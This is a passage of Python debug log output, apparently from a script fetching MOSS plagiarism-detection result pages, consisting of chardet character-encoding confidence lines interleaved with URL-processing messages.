active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5415272097897004\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match153-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match153-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match153-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match150-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match150-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match150-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match149-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match149-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match149-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match154-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32110\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32097\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32110\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32097\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19584\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32097\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19571\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16302\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32098\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19584\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16289\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19571\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32097\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16302\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19571\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16289\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19572\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16289\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19571\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16290\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16289\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5327751424859551\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match154-0.html\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match154-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match151-top.html\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5485999467671163\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5297635729864526\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match151-0.html\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match151-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match161-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match161-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match161-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5352421830981732\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 26974\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 26961\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 26974\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 26961\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 26961\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 26962\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 26961\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 31649\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 31636\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 31649\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 31636\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 31636\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 31637\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 31636\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.575657531514715\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5269192402629933\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match159-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match159-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match159-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match158-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match158-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match158-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match155-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match155-0.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match155-1.html\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5352421830981732\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match156-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17258\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32114\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17245\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17258\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32101\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17245\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32114\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17245\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32101\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17246\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32101\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17245\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32102\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32101\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5268249473180256\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5327477888368037\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match156-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match156-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match160-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match160-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match160-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match162-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match162-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match162-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 31641\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24834\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 31628\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24821\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 31641\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match157-top.html\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24834\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 31628\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24821\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 31628\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24821\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 31629\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24822\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 31628\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24821\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5667878181900473\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 